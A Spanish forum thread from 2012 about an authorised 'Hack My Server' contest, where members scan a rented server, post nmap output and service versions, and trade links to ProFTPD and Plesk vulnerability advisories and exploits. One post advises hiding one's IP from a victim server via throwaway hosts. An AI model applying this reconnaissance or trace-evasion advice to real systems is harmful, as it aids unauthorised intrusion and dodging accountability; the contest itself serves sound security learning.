Foro de elhacker.net

Seguridad Informática => Hacking Ético => Mensaje iniciado por: dimitrix en 25 Abril 2012, 00:40 am



Título: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 00:40 am
Hack My Server

El próximo día 01/05/2012 empezará un concurso que se tratará de Crackear un servidor (Totalmente legal todo). El concurso durará 30 días y si obtenemos permiso de el-brujo seguramente estará patrocinado por alguna empresa y habrá algún premio :-)

Bases:
  • Daremos la IP del servidor que hay que Crackear.
  • El servidor no tiene seguridad.
  • La IP del servidor se dará por privado.

También me gustaría dejar claro que la idea de realizar esto es para que todos los usuarios aprendamos de todos, por lo que los organizadores agradeceriamos que se realizaran comentarios para que así todo el foro poco a poco fuera consiguiendo acceder al servidor.

CONDICIONES

  • Se trata de ser colaborativos, es decir, si pedis la IP para atacar, contar en este POST como vais a atacar y lo que habeis conseguido.
  • La idea es que entre todos aprendamos.
  • Si alguien pide la IP, va atacando y no va informando en este POST, la próxima vez no se le entregará la IP del servidor.

GANADOR

  • Será el primero que consiga acceder como Root.
  • Tendrá que haber participado en este foro comentando, etc...
  • Se le enviará una botella (España) de cerveza.
    • La cerveza será una HACKER PSCHORR (http://kd59.files.wordpress.com/2010/03/hackerpschorrweisse.jpg) importada desde alemania.

¡Que gane el mejor!

-------------------------------------------

PUNTACIÓN

Belial & Grimoire - GANADOR
 - Muestra con que 2 exploits intentó atacar y con que programa: 1 punto
 - Indique que file de Plesk es 'posiblemente' vulnerable. : 1 punto
 - Muestra bug y link para posible XSS/SQLi en Plesk: 1 punto
 - Muestra escaneo positivo e indica el programa: 1 punto

maxim_o
 - Saca servicios del servidor: 2 puntos
 - Descubre posible vulneración (no es al final): 1 punto

opportunity
 - Posible SQLi en el Plesk: 1 punto
 - Muestra IP del server: -1000 puntos
 - Comparte posible SQLi: 1 punto

adastra
 - Muestra el source para atacar si fuera vulnerable el proFTP: 1 punto
 - Aporta como ha intentado acceder al PLESK y resuelve dudas: 1 punto
 - Adastra prueba exploit y comparte resultado: 1 punto


m0rf
 - Encuentra una vulnerabilidad (pero tiene que tiene que ser en local): 1 punto
 - Comparte exploit posible vulnerabilidad: 1 punto


ESTE CONCURSO HA TERMINADO


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: xiruko en 25 Abril 2012, 00:53 am
buenisima idea, se agradecen cosas asi en el foro!

ademas para la gente como yo que no tiene ni idea de acceder a un servidor esto seguro que le vendra muy bien para practicar un poco.

aunque una pregunta... se podria incluir en las bases que el ganador (o los ganadores) explicasen como lo han logrado? una vez acabado el concurso claro.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 25 Abril 2012, 00:55 am
Supongo que no lo diras pero, sera linux o windows el server?  :silbar:


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Fastolfe en 25 Abril 2012, 01:01 am
Por si no ha quedado claro en el otro tema: me apunto!
Y me alegro de que haya salido adelante ;)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 01:36 am
Citar
aunque una pregunta... se podria incluir en las bases que el ganador (o los ganadores) explicasen como lo han logrado? una vez acabado el concurso claro.

- Se me olvidó comentarlo, solo podrá nombrarse 'ganador' el que explique como lo ha realizado, puesto que esto es para aprender.

Citar
Supongo que no lo diras pero, sera linux o windows el server?
No me importa mucho decirlo pues es fácil saberlo: Linux.
De todos modos pondré la versión del SO y los puertos serán de serie.

Realmente no es más que un servidor reción instalado con un servidor apache, php, etc... pero nada securizado :-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 25 Abril 2012, 01:50 am
Que buena idea, así aprendemos un poco todos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 25 Abril 2012, 02:14 am
- Se me olvidó comentarlo, solo podrá nombrarse 'ganador' el que explique como lo ha realizado, puesto que esto es para aprender.
No me importa mucho decirlo pues es fácil saberlo: Linux.
De todos modos pondré la versión del SO y los puertos serán de serie.

Realmente no es más que un servidor reción instalado con un servidor apache, php, etc... pero nada securizado :-)

Ok.

Aguantara no? xDD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: isseu en 25 Abril 2012, 02:19 am
donde me apunto :)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 02:26 am
Citar
Aguantara no? xDD
- Los ataques espero que no xDDD
- Fisicamente es un servidor contratado, no está en mi casa...

Si lo dejo 'fácil' es para ir aprendiendo todos poco a poco y luego ir subiendo la seguridad, etc...

donde me apunto :)

El 1/5/2012 lo diré.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: cronos426 en 25 Abril 2012, 03:29 am
Uy pero que bueno estara esto  ;-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 25 Abril 2012, 15:38 pm
Corriendo un live cd de Back Track 5 ya sirve? sin instalarlo me refiero.

Se espera el Teorico para ir estudiando dias antes xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 17:37 pm
Corriendo un live cd de Back Track 5 ya sirve? sin instalarlo me refiero.

Se espera el Teorico para ir estudiando dias antes xD

Cada uno puede atacar como quiera :-)

PD: Yo también usaré el BT5


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 25 Abril 2012, 23:21 pm
Edu tienes razón, el teórico...

No entiendo lo del teórico ¿Podeis explicarlo?

Esto es una especie de concurso, no es un Tuto, una vez alguien consiga acceder, ya se realizará el tuto.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: jpmo4 en 26 Abril 2012, 00:04 am
Vale todo? jeje. Salu2


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 26 Abril 2012, 01:10 am
Vale todo? jeje. Salu2

Sí, excepto ataques por fuerza bruta y D/DOS.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: H1tchclock en 26 Abril 2012, 01:35 am
Estoy emocionado, al menos intentar poner en practica, lo "minimum" que aprendi aqui... Solo el intento ya me dejara feliz.... Gracias, elhacker.net  ;D


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: sopitas en 26 Abril 2012, 09:28 am
Hack My Server

El próximo día 01/05/2012 empezará un concurso que se tratará de Crackear un servidor (Totalmente legal todo). El concurso durará 30 días y si obtenemos permiso de el-brujo seguramente estará patrocinado por alguna empresa y habrá algún premio :-)

Bases:
  • Daremos la IP del servidor que hay que Crackear.
  • El servidor no tiene seguridad.
  • La IP del servidor se dará por privado.
  • Existirán 3 podios. Dependiendo el nivel de intrusión.

También me gustaría dejar claro que la idea de realizar esto es para que todos los usuarios aprendamos de todos, por lo que los organizadores agradeceriamos que se realizaran comentarios para que así todo el foro poco a poco fuera consiguiendo acceder al servidor.

Esta idea ha salido de aquí (http://foro.elhacker.net/foro_libre/propuesta_curso_ethical_hacking-t358544.0.html).

¡Comentarme que os parece!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 26 Abril 2012, 16:02 pm
Dimitrix, lo que pasa que como dejabas claro que esta idea salio del post del curso de ethical hacking.. pensaba que era relacionado, es decir, lo que aprendemos ahi aplicarlo en tu servidor. Pero bien, esto es cosa a parte, aca intentaran los que ya sepan del tema, yo me quedare viendo como van entonces xD Saludos!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 26 Abril 2012, 16:25 pm
Dimitrix, lo que pasa que como dejabas claro que esta idea salio del post del curso de ethical hacking.. pensaba que era relacionado, es decir, lo que aprendemos ahi aplicarlo en tu servidor. Pero bien, esto es cosa a parte, aca intentaran los que ya sepan del tema, yo me quedare viendo como van entonces xD Saludos!

Bueno, esa parte vendrá después, la idea es que 'entre todos' pongamos poco a poco ideas y consigamos crackear el servidor. Y luego veremos paso a paso como se hace.

Luego prepararemos ataques de SQL Injection, XSS, etc...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 26 Abril 2012, 16:41 pm
No si, esta bien, no hay problema, yo mirare como lo hacen aca y aprendere lo que no he podido aprender aun, que es el pase de una vez infectada la web pasarse al control de la pc, si es que es eso por lo menos lo que haran, eso espero xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 26 Abril 2012, 18:41 pm
Sí, excepto ataques por fuerza bruta y D/DOS.
****** mis preferidos. Que sepan que participare...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: raptorfx7 en 27 Abril 2012, 00:59 am
Y porque no se podrian ataques de fuerza bruta para encontrar las claves?....lo de DOS està mal pero fuerza bruta no le veo el porque


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 27 Abril 2012, 02:40 am
Y porque no se podrian ataques de fuerza bruta para encontrar las claves?....lo de DOS està mal pero fuerza bruta no le veo el porque

No es uan buena forma. No se trata de probar un diccionario de 1000 claves, sino que se puede tirar haciendo varios millones de combinaciones para no encontrar nada.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: The_Mushrr00m en 27 Abril 2012, 06:56 am
Buena La Iniciativa Espero Poder Aprender'


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 27 Abril 2012, 19:45 pm
El servidor sera 100% nuevo? Es porque tengo un metodo que ya use una vez y depende de lo nuevo que sea.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 27 Abril 2012, 20:26 pm
yo tmb me apunto


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 27 Abril 2012, 20:28 pm
A ver... Esto no tiene que ser vamos a reventar el servidor o colapsarlo... por eso fuerza bruta y Dos creo que es jorobar a todo el mundo....

El tema es sencillo, supongo que pondrá un servidor basado en linux con sus diferentes servicios corriendo etc sin parchear....

Los que participen prueban , miran, buscan vulnerabilidades, las explotan , y se le manda cuando se haya accedido al servidor... Se va poniendo las diferentes formas de las que se ha accedido detalladamente para que los que no lo logren/logremos aprendamos....
Y supongo que conforme se vaya superando, ira poniendo mas tramas parches etc

Vamos, creo que esa era la idea... Y mientras se van haciendo las cosas se vaya poniendo en el foro para que entre todos se logre entrar.... Un servidor para aprender y que aprendamos todos de todos.... No en plan entro soy el mejor ale .....


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h1t en 27 Abril 2012, 20:30 pm
Me parece una buena iniciativa, yo me apunto :)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 28 Abril 2012, 02:23 am
El servidor sera 100% nuevo? Es porque tengo un metodo que ya use una vez y depende de lo nuevo que sea.

No lo entiendo muy bien, el SO lo instalé hace 1 semana.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 28 Abril 2012, 02:24 am
A ver... Esto no tiene que ser vamos a reventar el servidor o colapsarlo... por eso fuerza bruta y Dos creo que es jorobar a todo el mundo....

El tema es sencillo, supongo que pondrá un servidor basado en linux con sus diferentes servicios corriendo etc sin parchear....

Los que participen prueban , miran, buscan vulnerabilidades, las explotan , y se le manda cuando se haya accedido al servidor... Se va poniendo las diferentes formas de las que se ha accedido detalladamente para que los que no lo logren/logremos aprendamos....
Y supongo que conforme se vaya superando, ira poniendo mas tramas parches etc

Vamos, creo que esa era la idea... Y mientras se van haciendo las cosas se vaya poniendo en el foro para que entre todos se logre entrar.... Un servidor para aprender y que aprendamos todos de todos.... No en plan entro soy el mejor ale .....

Es justamente eso :-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 28 Abril 2012, 04:33 am
a mi me parece genial, ya me estoy oxidando un poco por la falta de tiempo para eso, seria bueno reafirmar y aprender mas

me gusta la idea, por favor haganla si necesitan ayuda espero pueda ayudar para lograrlo, me pone de buen humor cosas donde se pueda aprender y compartir como antiguamente se hacia

 ;-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h3ct0r en 28 Abril 2012, 05:36 am
Me apunto!!  >:D >:D


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 28 Abril 2012, 16:51 pm
El primero que ingrese podria crear un archivo de texto, donde todos los que ingresen luego agregarian su nombre ahi xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 28 Abril 2012, 18:26 pm
Buena idea exepto porque el que ingrese despues si es  >:D malvado modificaria el archivo y pondria el suyo promero


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 28 Abril 2012, 18:40 pm
Buena idea exepto porque el que ingrese despues si es  >:D malvado modificaria el archivo y pondria el suyo promero

Se trata de confiar entre nosotros y no ser cabrones.



PD: Para los españoles, como la ley en españa es muy dura, si necesitais alguna acreditación y/o confirmación para que ataqueis los servidores es todo legal, os la puedo ofrecer sin problemas.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: kub0x en 28 Abril 2012, 20:44 pm
Es una idea que siempre tuve en mente y por fin sale aquí, gracias dimitrix. Espero que no haya problema con la legalidad del asunto, todos estamos aquí para aprender más.

Saludos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 28 Abril 2012, 22:24 pm
Si no me equivoco la lei española dice que si no lo denuncias no pasa nada tu no digas nada y ya esta


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 29 Abril 2012, 10:33 am
Si no me equivoco la lei española dice que si no lo denuncias no pasa nada tu no digas nada y ya esta

No es cierto del todo. Según tengo entendido el intentar acceder a un servidor aunque no lo consigas es delito. Aunque está claro que si no hay denuncia no pasa nada.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 29 Abril 2012, 11:42 am
Citar
No es cierto del todo. Según tengo entendido el intentar acceder a un servidor aunque no lo consigas es delito. Aunque está claro que si no hay denuncia no pasa nada.
1- WTF? No lo entiendo entonces siempre que voy a un servidor es delito? Espero que haya sido un error porque si no...

2- Lo que yo decia

3- Como se llama el servidor? (Si lo puedes decir ahora si no dilo con la IP)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 29 Abril 2012, 18:32 pm
Se refiere a intentar acceder atacandolo.. y si, es lo que decias vs ELVJop tambien. Lo que quiere decir es que no importa si por ejemplo accedes a facebook o no, iras preso si te denuncian solo por el hecho de intentarlo.

El servidor se llama Pirulo... mira lo que preguntas xD ya dijo que la ip la dara por MP luego, empezando el 1 de Mayo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 29 Abril 2012, 19:04 pm
El nombre es muy importante si no mi metodo no funcionara. Ahora mismo te pongo tu reto si lo encuentro... (Ya sabes de que hilo hablo)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 29 Abril 2012, 23:43 pm
El nombre es muy importante si no mi metodo no funcionara. Ahora mismo te pongo tu reto si lo encuentro... (Ya sabes de que hilo hablo)

Es que un servidor puede tener varios nombres asociados (de dominio), aunque la ip que lo resuelve solo tenga uno.

De todos modos, yo solo entregaré la IP, tu tendrás que resolver el nombre, con un ping o como quieras.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 30 Abril 2012, 15:37 pm
Estará listo hoy a las 00:00 ?



Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 30 Abril 2012, 16:32 pm
Estará listo hoy a las 00:00 ?

Pues eso me gustaría, pero todavía no se, se intentará :-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: HdM en 1 Mayo 2012, 01:44 am

@Dimitriiiiiiiiiiiixxxxxx, ¿habemus new serverrrrrr or not?

Tienes a la gente deseando irrrrrrrr...

...¡¡¡¡AL ATAKEEEEEEEEERRRRLLLL!!!!(http://www.gif-animados.net/gifs/famososcomicos-7.gif)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: h3ct0r en 1 Mayo 2012, 06:30 am
Ya tenemos server para trastear??? Seguimos esperando!!!  >:D :silbar:


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 11:38 am
Sí, ya tenemos server, teneis que mandarme un MP y os envío la IP.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 1 Mayo 2012, 11:50 am
Ahora se desconecta! Mala pata la mia.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 13:09 pm
ELVJop ya te lo he enviado, al igual que a todos que me lo han pedido pro privado.

Algo muy importante, he cambiado las normas y ya he puesto el premio, así que miraros el primer mensaje de este POST.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 1 Mayo 2012, 13:54 pm
Pues yo intente un programilla que se soluciono con un parche para linux que no se como te entra dentro y te dega trastear  >:D la mala noticia es que no se porque no se si es tu server o que pero se me esta resistiendo.  :-[


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 18:52 pm
Bueno voy poniendo algo , mas que nada para que la gente que tiene más idea se vaya animando a postear.... ^^


Citar
nmap -O -v xxxxxxxxxxxxxxx
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
25/tcp   open     smtp
53/tcp   filtered domain
80/tcp   open     http
106/tcp  open     pop3pw
110/tcp  open     pop3
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  open     imap
443/tcp  open     https
445/tcp  filtered microsoft-ds
465/tcp  open     smtps
993/tcp  open     imaps
995/tcp  open     pop3s
1720/tcp filtered H.323/Q.931
3306/tcp filtered mysql
8443/tcp open     https-alt
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.26

220 ProFTPD 1.3.3c Server (ProFTPD) 21
SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu7 22
ESMTP Postfix (Ubuntu) 25
Apache Server 80


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 1 Mayo 2012, 19:10 pm
llegue tarde pero vere si puedo lograr algo


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: ELVJop en 1 Mayo 2012, 19:16 pm
Adios es 2.6.x? Ya me voy despidiendo...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: $Edu$ en 1 Mayo 2012, 19:17 pm
Jajaja buen premio xD Espero la ip por privado Dimitrix, que quiero ir viendo por lo menos, saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 1 Mayo 2012, 19:19 pm
si alguien me puede enviar la ip del server.



Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 19:25 pm
La ip, escribirle a dimitrixx y cuando se conecte os dará ip ....
No llegais tarde... ha empezado hoy y dura todo el mes... asi que no os agobieis.....

Mmmmm parece que la version de proftpd es vulnerable.....
http://www.securityfocus.com/bid/44933


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 1 Mayo 2012, 19:34 pm
Creo k el ganador del concuros explicara como lo hizo para ganar, y de paso los que perdieron aprenderian.

Como por ejemplo yo

Yo inteentare atacar al server seguramente no logro nada jaja.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 19:54 pm
Ya he respondido todas los mensajes privados, si le falta a alguien que me mande un mensaje privado y se la envío.

Por ahora
 - ProFTPD 1.3.3c Server (ProFTPD) 21

Citar
ProFTPd es un servidor FTP. Se promociona desde su página web como estable y seguro, cuando se configura correctamente. El servidor ProFTPd se promociona a sí mismo como un "Software servidor FTP altamente configurable con licencia GPL"

- Al parecer es vulnerable puesto que lo instala el Plesk, así que ya sabemos que tiene el PLESK.

Como explotarlo, más info: http://wiki.woop.es/ProFTPD_TELNET_IAC



Al parecer si conseguimos explotar esta vulnerabilidad podremos tirar el servidor.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 20:06 pm
Pero esa version no es vulnerable no?
Segun he leido eso se corrige en la 1.3.3c
2010-10-29 TJ Saunders∞, desarrollador de ProFTPD, abre la incidencia en el Bugzilla (Bug #3521 - Telnet IAC processing stack overflow∞) y horas después se libera la versión 1.3.3c∞ que soluciona el problema.

Versiones de ProFTPD vulnerables


Todas las versiones de ProFTPD comprendidas entre 1.3.2rc3 y 1.3.3b son vulnerables, el listado completo es:

    1.3.2rc3
    1.3.2rc4
    1.3.2
    1.3.3rc1
    1.3.3rc2
    1.3.3rc3
    1.3.3rc4
    1.3.3
    1.3.3a
    1.3.3b

Por lo que en este caso no podría ser explotada no?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 1 Mayo 2012, 20:08 pm
A ver que tal... dado que es todo el mes, hay tiempo para jugar un poco.
Me apunto.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 20:22 pm
Vale, saco más datos con sus versiones

21/tcp   open     ftp      ProFTPD 1.3.3c
22/tcp   open     ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
25/tcp   open     smtp     Postfix smtpd
80/tcp   open     http     Apache httpd
106/tcp  open     pop3pw   poppassd
110/tcp  open     pop3     Courier pop3d
143/tcp  open     imap     Courier Imapd (released 2004)
443/tcp  open     ssl/http Apache httpd
465/tcp  open     ssl/smtp Postfix smtpd
993/tcp  open     ssl/imap Courier Imapd (released 2004)
995/tcp  open     ssl/pop3 Courier pop3d
8443/tcp open     ssl/http sw-cp-server httpd (Parallels Plesk WebAdmin version psa-10.2.0-1011110331.11)



Mmm... nos encontramos que mediante http y el puerto 8443 tenemos acceso al Plesk. http://*******:8443

Y lo mejor, tenemos la versión: 10.2.0

A ver que tal... dado que es todo el mes, hay tiempo para jugar un poco.
Me apunto.

Me alegra escuchar esto.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 1 Mayo 2012, 21:25 pm
Buenas:

Curioso concurso, no tengo idea de hacking, aún así quiero aprender a protegerme ya que he instalado Apache con Windows y linux.

Hice un manual sobre Apache con Windows, más adelante lo haré con Linux. Este concurso está bien para ampliar conocimiento en seguridad para protegernos, de paso haré un manual más actualizado tanto en Windows como Linux.

Ver manual (http://electronica-pic.blogspot.com.es/2009/06/servidor-casero-apache-php-mysql.html)

Saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: fcastro93 en 1 Mayo 2012, 21:29 pm
Hola a todos :D
Yo tambien me uno al concurso!! jaja
Por ahora les daré un pequeño truco que tal vez algunos sepan ya pero es para que todos aprendamos n.n
En este caso (y casi que solo en este caso jaja) el servidor nos va a dejar atacar, el problema esta en que si lo hacemos desde nuestra casa hacia un servidor cualquiera, aunq tengamos algun proxy para ocultar ip, cabe la posibilidad de que rasteen nuestra ip.
Pues aqui les traigo como evitar eso.

El problema esencial está en que cuando conectamos a un servidor lo que realmente hacemos la mayoria de veces es darle los parámetros (como la IP nuestra) para que sea él el que se conecte a nosotros, creando un log (registro por asi decirlo) de quienes somos.
Imaginesen que pasaria si no nos conectaramos nosotros sino otra maquina siguiendo nuestras instrucciones y luego de esto cambiamos la ip de esa maquina por otra, haciendo que si el servidor victima trata de localizarnos no encuentre la maquina intermediaria.
Esto es posible con servicios como no-ip (debido a que ya me extendi un poco solo les puedo dar el nombre de este ejemplo) donde nos dan un server que se puede usar una vez y luego "renombrar" la ip o simplemente eliminarlo.
Esto es lo que llaman un método para ocultar IP y el que más me gusta :D
Ojalá les sirva!!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 1 Mayo 2012, 21:33 pm
Voy bien, voy bien...

Recuerda que tienes que compartir. Para esto está creado este 'concurso' y estamos pagando el servidor, para que todos aprendamos.

Suerte :-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 1 Mayo 2012, 21:42 pm
La idea es no saber que SO usan para hackear, así averiguan cual es de paso.

Lo mejor es que no sepan que servidor Web usan, se puede desactivar el Apache y casi, cualquier otro, así se dificulta más. Recuerdo hace tiempo desafié a la gente, ni uno me han hackeado porque no tenían conocieminto necesario y sin cortafuegos.

Saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 1 Mayo 2012, 22:13 pm
Bueno pues yo me voy a poner haber si consigo algo  >:D

Una duda que tengo, existe alguna aplicación web corriendo en el servidor a mayores del panel de control, como por ejemplo alguna web asociada con algún dominio? Creo que hay una manera de saberlo pero no tengo ni idea de como se hace :S

Edit: Haciendo un whois inverso me he topado con este dominio [borrado] :D pero parece que la aplicación web es la misma que sin ingresar el dominio.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 1 Mayo 2012, 22:23 pm
No pongais ips , ni nombres de host, etc por que sino es tonteria que de la ip por privado....


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 1 Mayo 2012, 22:41 pm
Hola:

Lo primero que se hace es obtener cualquier información del servidor, tipo de Linux, versión exacta. Si lo saben, buscar en google vulneración y fallos de ese SO para localizar error. También con los demás programas, sea servidor FTP, Apache, etc.

si alguien descubre un fallo. ¿Se peude poner un archivo de texto en el escritorio que diga hola.txt, si es una Web, que ponga hola hola amigos?

Saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 01:29 am
Citar
¿Se peude poner un archivo de texto en el escritorio que diga hola.txt, si es una Web, que ponga hola hola amigos?

Claro.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: pwnz en 2 Mayo 2012, 01:32 am
Aún se puede apuntar gente? me gustaría intentarlo si tengo un rato libre  ;D Saludos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Xenomorfo77 en 2 Mayo 2012, 02:30 am
Yo tambien me apunto, todo sea por aprender. Un saludo a todos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 2 Mayo 2012, 02:57 am
Ayer hice el escaneo, y prove el exploit del proftp. El exploit no me funcionó, hoy probaré otra vez ya que tenia algunos problemas con el firewall.

De pasada vi también que hay un sql inject y xss en el plesk. A parte el openssh tiene este concepto para un exploit (que en teoria funciona), se trata de compilar jpake en tu cliente con los archivos que hay en este enlace: https://github.com/seb-m/jpake/tree/master/openssl-jpake/ (https://github.com/seb-m/jpake/tree/master/openssl-jpake/)
Este exploit solo funcionara por lo que tengo entendido si el servidor tiene compilada la parte de jpake, sino no funcionara.

No he buscado más para el openssh, lo único que encontre fueron un par de DOS diría, pero ahí lo deje.

Pues nada acabo de poner a punto el sistema y os cuento más en unas horas/minutos. Me parece que voy a continuar con el clásico nc.exe xDD

Saludos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Once en 2 Mayo 2012, 07:14 am
Probé el exploit para el ProFTP pero parece que el server no es de los que está backdorizado(http://www.1337day.com/exploits/15026)
También le heché un vistazo a los métodos del HTTP (nada interesante)

Mañana si tengo algo de tiempo busco ese SQLi

Saludos!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 2 Mayo 2012, 11:59 am
El proftpd no está backdorizado.... en teoria esa version fue backdorizada hace mucho tiempo por que entraron en el servidor de proftp y cambiaron el archivo original por la version backdorizada y estuvo asi unos dias en descarga ... pero ahora mismo ya no es así.

En teoria tiene una vulnerabilidad http://www.securityfocus.com/bid/44933/info la cual si se explota te da permisos de root, y si no funciona igual le haces un dos a la maquina....
En esta pagina sale la informacion y programación etc del exploit: http://phrack.org/issues.html?issue=67&id=7#article

Ahora el plesk panel 10.2.0 es vulnerable a ataques de sql inyection y xss y tambien una vulnerabilidad remota pero no veo informacion de como poder explotarla.
http://www.securityfocus.com/bid/52267
http://www.securityfocus.com/bid/49887


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 12:06 pm
maxim_o Ayer me encontré con lo del Plesk, pero creo que para el SQLi necesita tener un Addon que no viene de serio 'creo'.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 2 Mayo 2012, 12:21 pm
Aunque todavia no tengo la IP del server me he puesto con ello viendo la info que estais dejando.

Viendo que tiene Plesk y la version he visto varias vulnerabiliades:
http://kb.parallels.com/es/113324
http://www.exploit-db.com/exploits/15313/

Hace unos meses hubo algo muy gordo relacionado con Plesk quizás va por ahí el tema.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 2 Mayo 2012, 12:22 pm
ya tengo la ip!!!! thanks a lot.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: thein0de en 2 Mayo 2012, 13:35 pm
Me apunto a echar un vistazo... Si sois tan amables de enviarme la IP...

Un saludo!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 2 Mayo 2012, 14:32 pm
Dimitrix, pon la IP, sino algunos tendrán que esperar a que le envies.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 2 Mayo 2012, 14:41 pm
Creo que de eso se trata que le escriban un privado.... hay un mes entero... tampoco hay prisa asi cualquiera que ojee el tema no podra ponerse a atacar y solo "jueguen" los que participan en el


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 2 Mayo 2012, 14:45 pm
Ah, hostia ya no me acordaba del mes xD
Entonces, ¡Paciencia!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 2 Mayo 2012, 15:03 pm
Exacto, la idea es que participemos todos, ya que estoy pagando todo esto, lo único que espero es que la gente 'colabore'.

No ataque para probar y no publique lo que encuentra. Si quieren hacer eso me parece muy bien, pero no con mi server. Aquí quien quiere atacar que colabore. Esto es una comunidad :-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Breixo en 2 Mayo 2012, 15:17 pm
Yo creo que el punto más débil como habéis comentado es el panel de parallels, esta vulnerabilidad http://kb.parallels.com/en/113313. Con lo que en teoría se podría entrar por ahí.

